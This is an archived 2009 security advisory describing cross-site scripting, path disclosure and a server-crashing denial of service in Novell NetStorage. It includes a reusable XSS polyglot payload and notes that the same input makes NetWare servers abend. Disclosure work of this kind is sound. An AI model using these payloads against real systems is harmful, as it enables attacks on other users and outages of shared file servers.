what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Netstorage XSS / Denial Of Service

Novell Netstorage XSS / Denial Of Service
Posted Mar 27, 2009
Authored by BugsNotHugs

Novell Netstorage suffers from cross site scripting and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, xss
SHA-256 | 9eed18c6c8f4bc12af41a5a4f256eeb71124d7de5d24e27afebf1272d05f0e09

Novell Netstorage XSS / Denial Of Service

Change Mirror Download
- Novell Netstorage Multiple Vulnerabilities

- Description

"Novell NetStorage acts as a bridge between a company's protected Novell network
and the Internet, providing protected file access from any Internet
location. Files
and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise
Server can be
accessed using either a browser or via Network Neighborhood and Microsoft Web
Folders; no Novell Client^Ù software is required. Users can securely
access files
from any IP-enabled machine via Secure Sockets Layer (SSL) and Secure Hypertext
Transfer Protocol (HTTPS)."

Novell NetStorage contains a wide variety of vulnerabilities that may
allow an attacker
to cause a denial of service, gain configuration information or exploit other
users of the application.

#1 - Filter Field XSS

The 'filter' field does not sanitize user-supplied input. An attacker
could use this
to carry out cross-site scripting attacks against other authenticated users.

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#2 - Mail File Action Path Disclosure

On a file list, if a user right clicks a file, chooses the 'mail'
option and then
pastes script code in any field, the application will produce an error message
disclosing the installation path:

Paste the following script:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Resulting error:

OES:
'file:/var/opt/novell/novlwww/email.xsl': (1): mismatched end tag:
expected "to" but got "SCRIPT"

Netware:
'file:/SYS:/tomcat/4/email.xsl': (1): mismatched end tag: expected
"subject" but got "SCRIPT"

#3 - File Attribute Malformed Input Server DoS

When interacting with files, a user can right click on the file and click
either 'NFS Info' or 'Netware Info'. Supplying script code into various fields
will cause the Netware server to abend and lock up.

Note: This was only tested on version 2.0.1 on netware 6.5 SP6, not OES.

The following script code causes the issue:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

- Product

Novell Inc., Netstorage, 3.1.5-19 on OES - 2.0.1 on netware 6.5 SP6

- Solution

None

- Timeline

2008-06-06: Vulnerability Discovered
2008-07-07: Disclosed to Vendor (no ack)
2008-10-05: Re-sent to Vendor (no ack)
2009-03-26: Disclosed to Public (no more playing nice)

--

BugsNotHugs
Shared Vulnerability Disclosure Account
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close